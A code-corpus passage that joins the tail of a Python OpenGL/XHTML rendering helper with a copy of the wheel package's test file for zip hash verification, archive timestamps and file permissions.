body {margin: 0px; background-color: white; font-family: sans-serif;}
div.frame {border: 1px solid #555; background-color: white;}
h1 {font-size: %(font_size)spx; color: black; margin: 2px;}
p {font-size: %(font_size)spx; color: #444; margin: 2px;}
.button {font-size: %(font_size)spx; border: 1px solid black; padding: 2px; margin: 0px;}
a {color: blue;}
'''%locals()
def xhtml(self, text, width=None, height=None, style=None):
layout = Layout()
if style is None:
style = self.stylesheet
layout.set_xhtml('''<?xml version="1.0"?>
<html><head><style>%s</style></head>
<body>%s</body></html>'''%(style, text))
layout.viewport_x = 0
layout.viewport_y = 0
layout.viewport_width = width or 256
layout.viewport_height = height or 200
h = int(layout.view.canvas_height)
w = int(layout.view.canvas_width)
layout.viewport_width = w
layout.viewport_height = h
return layout
def xhtmlAsTexture(self, text, width=None, height=None, style=None):
return xhtmlAsTexture(self.xhtml(text, width, height, style))
def xhtmlAsTexture(layout):
h = int(layout.view.canvas_height)
w = int(layout.view.canvas_width)
def _f():
glPushAttrib(GL_CURRENT_BIT|GL_COLOR_BUFFER_BIT|GL_ENABLE_BIT)
# always draw onto solid white
glClearColor(1, 1, 1, 1)
glClear(GL_COLOR_BUFFER_BIT)
glPushMatrix()
glLoadIdentity()
glTranslatef(0, h, 0)
# ... and blend with solid white
glColor4f(1, 1, 1, 1)
layout.view.draw()
glPopMatrix()
glPopAttrib()
return util.renderToTexture(w, h, _f)
class Gradient(object):
def __init__(self, *corners):
'''Corner colours in order bottomleft, topleft, topright,
bottomright.
'''
self.corners = corners
def __call__(self, rect, clipped):
scissor = clipped != rect
if scissor:
glPushAttrib(GL_ENABLE_BIT|GL_SCISSOR_BIT)
glEnable(GL_SCISSOR_TEST)
glScissor(*map(int, (clipped.x, clipped.y, clipped.width,
clipped.height)))
glBegin(GL_QUADS)
glColor4f(*self.corners[0])
glVertex2f(*rect.bottomleft)
glColor4f(*self.corners[1])
glVertex2f(*rect.topleft)
glColor4f(*self.corners[2])
glVertex2f(*rect.topright)
glColor4f(*self.corners[3])
glVertex2f(*rect.bottomright)
glEnd()
if scissor:
glPopAttrib()
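# Gradient usage sketch: `rect` stands in for any object exposing the
# bottomleft/topleft/topright/bottomright attributes used above.
#
#     fade = Gradient((0, 0, 0, 1), (0, 0, 0, 0), (0, 0, 0, 0), (0, 0, 0, 1))
#     fade(rect, rect)  # clipped == rect, so no scissoring is needed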
|
neharejanjeva/techstitution
|
refs/heads/master
|
app/logs/venv/lib/python2.7/site-packages/wheel/test/test_wheelfile.py
|
327
|
import os
import wheel.install
import wheel.archive
import hashlib
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
import codecs
import zipfile
import pytest
import shutil
import tempfile
from contextlib import contextmanager
@contextmanager
def environ(key, value):
old_value = os.environ.get(key)
try:
os.environ[key] = value
yield
finally:
if old_value is None:
del os.environ[key]
else:
os.environ[key] = old_value
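# environ() usage sketch: the variable is restored (or removed) on exit,
# as relied upon by test_zipfile_timestamp() below.
#
#     with environ('SOURCE_DATE_EPOCH', '315576060'):
#         ...  # code that reads os.environ['SOURCE_DATE_EPOCH']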
@contextmanager
def temporary_directory():
# tempfile.TemporaryDirectory doesn't exist in Python 2.
tempdir = tempfile.mkdtemp()
try:
yield tempdir
finally:
shutil.rmtree(tempdir)
@contextmanager
def readable_zipfile(path):
# zipfile.ZipFile() isn't a context manager under Python 2.
zf = zipfile.ZipFile(path, 'r')
try:
yield zf
finally:
zf.close()
def test_verifying_zipfile():
if not hasattr(zipfile.ZipExtFile, '_update_crc'):
pytest.skip('No ZIP verification. Missing ZipExtFile._update_crc.')
sio = StringIO()
zf = zipfile.ZipFile(sio, 'w')
zf.writestr("one", b"first file")
zf.writestr("two", b"second file")
zf.writestr("three", b"third file")
zf.close()
# In default mode, VerifyingZipFile checks the hash of any read file
# mentioned with set_expected_hash(). Files not mentioned with
# set_expected_hash() are not checked.
vzf = wheel.install.VerifyingZipFile(sio, 'r')
vzf.set_expected_hash("one", hashlib.sha256(b"first file").digest())
vzf.set_expected_hash("three", "blurble")
vzf.open("one").read()
vzf.open("two").read()
try:
vzf.open("three").read()
except wheel.install.BadWheelFile:
pass
else:
raise Exception("expected exception 'BadWheelFile()'")
# In strict mode, VerifyingZipFile requires every read file to be
# mentioned with set_expected_hash().
vzf.strict = True
try:
vzf.open("two").read()
except wheel.install.BadWheelFile:
pass
else:
raise Exception("expected exception 'BadWheelFile()'")
vzf.set_expected_hash("two", None)
vzf.open("two").read()
def test_pop_zipfile():
sio = StringIO()
zf = wheel.install.VerifyingZipFile(sio, 'w')
zf.writestr("one", b"first file")
zf.writestr("two", b"second file")
zf.close()
try:
zf.pop()
except RuntimeError:
pass # already closed
else:
raise Exception("expected RuntimeError")
zf = wheel.install.VerifyingZipFile(sio, 'a')
zf.pop()
zf.close()
zf = wheel.install.VerifyingZipFile(sio, 'r')
assert len(zf.infolist()) == 1
def test_zipfile_timestamp():
    # An environment variable can be used to influence the timestamp on
    # ZipInfo objects inside the zip. See issue #143.
with temporary_directory() as tempdir:
for filename in ('one', 'two', 'three'):
path = os.path.join(tempdir, filename)
with codecs.open(path, 'w', encoding='utf-8') as fp:
fp.write(filename + '\n')
zip_base_name = os.path.join(tempdir, 'dummy')
        # The earliest date representable in ZipInfos, 1980-01-01
with environ('SOURCE_DATE_EPOCH', '315576060'):
zip_filename = wheel.archive.make_wheelfile_inner(
zip_base_name, tempdir)
with readable_zipfile(zip_filename) as zf:
for info in zf.infolist():
assert info.date_time[:3] == (1980, 1, 1)
def test_zipfile_attributes():
# With the change from ZipFile.write() to .writestr(), we need to manually
# set member attributes.
with temporary_directory() as tempdir:
files = (('foo', 0o644), ('bar', 0o755))
for filename, mode in files:
path = os.path.join(tempdir, filename)
with codecs.open(path, 'w', encoding='utf-8') as fp:
fp.write(filename + '\n')
os.chmod(path, mode)
zip_base_name = os.path.join(tempdir, 'dummy')
zip_filename = wheel.archive.make_wheelfile_inner(
zip_base_name, tempdir)
with readable_zipfile(zip_filename) as zf:
for filename, mode in files:
info = zf.getinfo(os.path.join(tempdir, filename))
assert info.external_attr == (mode | 0o100000) << 16
assert info.compress_type == zipfile.ZIP_DEFLATED
|